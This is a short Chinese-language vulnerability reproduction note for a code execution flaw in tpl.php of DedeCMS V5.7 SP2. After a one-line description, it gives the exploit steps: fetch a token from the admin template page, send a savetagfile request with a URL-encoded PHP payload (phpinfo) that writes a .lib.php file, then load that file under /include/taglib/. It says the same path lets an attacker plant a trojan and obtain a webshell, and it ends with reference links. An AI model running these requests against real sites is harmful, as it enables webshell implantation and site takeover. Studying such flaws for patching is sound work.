织梦内容管理系统(DedeCms)是一款PHP开源网站管理系统。
DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,攻击者可利用该漏洞在增加新的标签中上传木马,获取webshell
安装织梦CMS环境
后台界面
访问 域名+/dede/tpl.php?action=upload 获取token,右键查看源代码
访问 域名 + /dede/tpl.php?filename=hahaha.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=token值
文件名可自定义,必须以.lib.php结尾
访问 域名+/include/taglib/hahaha.lib.php
漏洞详情
###############################################
参考链接:
https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS
https://www.freebuf.com/vuls/164035.html